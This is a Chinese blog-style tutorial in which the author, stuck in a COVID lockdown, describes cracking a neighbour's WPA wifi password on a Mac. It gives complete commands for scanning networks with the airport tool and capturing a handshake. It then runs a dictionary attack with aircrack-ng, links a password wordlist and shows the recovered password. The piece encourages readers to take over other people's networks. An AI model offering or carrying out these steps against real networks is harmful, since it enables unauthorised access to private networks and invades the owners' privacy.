出差第二天，住的小区因为疫情被封，宿舍又没有wifi，看着附近满满的WIFI信号列表，wifi万能钥匙却一个都连接不上，心中一万匹CNM。。。于是电脑连上手机热点，然后各种折腾，终于破解了一个隔壁的wifi密码。

准备工作

1.电脑：MacBook Pro （本机系统版本为 macOS Catalina 10.15.6 ）

2.下载软件：MacPorts，然后安装（提醒：安装时断网，不然极有可能卡死）

3.更新MacPorts，打开终端，输入命令（两次）：

sudo port selfupdate

​ 下载安装MacPorts可参考：https://www.cnblogs.com/Mateo-dengmin/p/15855168.html

4.更新完成后，安装aircrack-ng，输入命令：

sudo port install aircrack-ng

5.Mac系统自带WIFI工具：airport，运行该工具，该程序的路径默认为：/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport，可以直接运行也可以在终端输入命令来运行

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

SSID 是 wifi名称，RSSI 是信号强度，CHANNEL 是信道。效果如下：

6.下载wifi密码字典（多种可供选择）

链接:https://pan.baidu.com/s/1uSHL7PVbLqkZZqAZhb6Epw 密码: gl1t

7.获取本机网卡信息，输入命令：

ifconfig

本机电脑网卡为 en0

破解开始

1.获取握手包，开始抓包，en0为电脑网卡，13为监听的信道，命令如下：

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport en0 sniff 13

2.监听之后，Wi-Fi图标会变化，使用ctrl+c停止监听，系统会将监听到的数据cap文件保存到本地/tmp文件夹下。打开cap文件，查看cap文件中的数据是否被抓取到，输入命令查看：

sudo aircrack-ng /tmp/airportSniffhKI8Kg.cap

如果要查询的路由列表的 Encryption中（0 handshake）是抓包失败，（1 handshake）则是抓包成功，否者要回到第1步重新抓取。（抓包时需要刚好这段时间有人重新连接了wifi才能抓到 WPA(1 handshake)的数据）

3.进入字典所在目录(进入个人存放wifi密码字典目录)

cd  ~/Documents/wifi

4.开始破解，dic.txt 为字典文件，/tmp/airportSniffhKI8Kg.cap为抓取到的握手包，命令如下：

sudo aircrack-ng -w dic.txt /tmp/airportSniffhKI8Kg.cap

效果如下：

提示「Index number of target network ?」时，输入 Encryption 中为（1 handshake）数据的行号，这里输入730。

等待破解结果...，中断破解过程可以直接按 command + c 组合键退出。破解过程所需时间长短受电脑硬件配置、字典体积大小的影响。如果dic.txt字典破解失败，则可以换其它字典进行破解，直到破解成功。

5.如果破解成功则会如下图所示：

这里破解出来的密码为：b36tm772

最后，祝大家都能蹭网成功！